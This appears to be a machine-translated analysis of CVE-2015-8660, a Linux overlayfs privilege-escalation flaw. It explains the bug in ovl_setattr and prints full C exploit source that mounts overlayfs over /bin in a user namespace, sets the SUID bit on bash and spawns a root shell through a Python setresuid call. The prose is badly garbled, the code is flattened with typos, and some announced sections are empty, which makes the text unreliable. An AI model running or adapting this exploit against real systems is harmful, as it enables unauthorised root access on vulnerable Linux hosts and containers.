cve-2015-8660 Analysis

0x00 test Environment

	Use environment	Note
Operating system	Ubuntu15.04	Virtual machines
Kernel version	3.19.0-15-generic
Source of vulnerability	/fs/overlayfs/inode.c	Before 2015.12.11
Exp	C	Right to withdraw

0x01 principle Analysis:

1) Overview

Common kernel Vulnerabilities we'll find a way to do this by executing Commit_creds (prepare_kernel_creds (0); To achieve the purpose of extraction, and this vulnerability implements another ingenious logic to bypass the right posture. The kernel version affected by this vulnerability includes linuxkernel 3.18.x,3.19.x,4.1.x, 4.2.x,4.3.x.

OVERLAYFS is currently used in a wide range of hierarchical file systems, the implementation of simple, with the upper and lower merge, the same name masking, write-time copy, etc., designed to run a read-only device (downlevel file) when creating a writable temporary file system (upper-level file).

2) Vulnerability Analysis

The vulnerability isfs/overlayfs/inode.cinovl_setattr ()caused by a mistake in the function. In anamespacethe processes in the process will have their ownCap_sys_adminempowered, so you can modify yournamespaceunderMountof theOVERLAYFScan be exploited to bypass the file system check, thus escapingnamespace, modify any of the file properties by setting the mountedBashof theSUIDbit, which executes in the main process after the child process has endedSetreuidwill beUID,GID,EidZero, then aShellthat isRootpermissions. It's a patch comparison .

3)POC

I will use the Mount command operation to illustrate the properties of the original file by modifying the file properties attached to the OVERLAYFS :

0x02 Exploit

1) Use of ideas

? using CLONE (childfunc,child_stack+stack_size,clone_newuser| clone_newns| Sigchld,args) Create the user and Mount namespace processes (proven, add the remaining namespace can also be raised);

② Sub-process mount operation,/bin as a lower directory mount a OVERLAYFS to the temporary directory/tmp/exp/o, and the temporary directory/tmp/exp/u as the upper directory;

③ Mount Overlayfs, because the underlying directory is/bin, so mount,/tmp/exp/o directory also has/bin under the bash file;

④ because the system does not check whether there is permission to modify the file attributes, chmod can set the bash suid bit, this bash has the root temporary privileges;

⑤ namespace External setresuid (0,0,0) set the new shell as the root authority.

2) Exp:

#include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sched.h> #include < linux/sched.h> #include <signal.h> #include <sys/mount.h> #include <stdlib.h> #include <sys/       stat.h>static Char child_stack[1024*1024];static int child_exec (void *stuff) {printf ("Clone a user namespace\n"); mkdir ("/tmp/w", 0777), mkdir ("/tmp/u", 0777), mkdir ("/tmp/o", 0777);p rintf ("Mount Overlayfs in User namespace:\n"); if ( Mount ("overlay", "/tmp/o", "overlay", Ms_mgc_val, "lowerdir=/bin,upperdir=/tmp/u,workdir=/tmp/w")!=0)// Mount the overlay file system with a magic_number, insignificant {printf ("Mount Failed...\n"), fprintf (stderr, "Mount Failed...\n");} else{printf ("Mount sucess!! \ n ");} chmod ("/tmp/w/work", 0777); ChDir ("/tmp/o");  Change the current working directory chmod ("bash", 04755); Bash Suid set chdir ("/"),//to the root directory to go to Umount ("/tmp/o"),//Cancel mount, at this time namspce outside the suid of Bash is also set to return 0;} int main (int argc,char *argv[]) {int status;pid_t init;int clone_flags = clone_newns | clone_newuts | clone_newpid| clone_newnet | CLONE_NEWIPC | Sigchld;//Create all Namespacestruct stat s;if ((init = fork ()) = = 0) {if (Unshare (clone_newuser)!=0) {printf ("Failed to create new user n Amespase\n ");} pid_t pid = Clone (Child_exec,child_stack + (1024*1024), clone_flags,null);//create sub-process if (PID < 0) {printf ("error\n"); fprintf (stderr, "failed to create new Mount Namespace\n"); exit (-1);}                Waitpid (pid,&status,0); printf ("Now return to parent process\n");       return 0;} Usleep (30000);//suspend main process wait (NULL);//wait for child process to return stat ("/tmp/u/bash", &s);//Get Bash File information printf ("Get the S.st_mode is%o\n"                , S.st_mode); if (S.st_mode = = 0x89ed)//Verify that the suid of bash is set to {printf ("Successfully sets the Bash ' suid as below shown:\n"); System ("ls-al/tmp/u/|                grep bash ");                printf ("\ n"); printf ("\ n"); Execl ("/tmp/u/bash", "Bash", "-P", "-C", "Python-c" Import Os;os.setresuid (0,0,0); Os.execl ('/bin/bash ', ' bash '); "", NULL);//Use Python to start the shell, set the Uid,gid,eid value, get root privileges}else{printf ("Execl error!!        \ n ");} return 0;}

0x03 Process Summary

1) The effect of the right to lift

after performing the pwn ,the suid of the/tmp/us mounted bash is set:

To get root privileges:

2) Summary

The use of user Namespaes to provide some kernel functionality for unauthorized users increases the risk of kernel attacks, andLinux Container based on these Namespaces realizes isolation, which can lead to container escaping attack if proper power allocation, checksum and kernel management are not taken.

cve-2015-8660 Analysis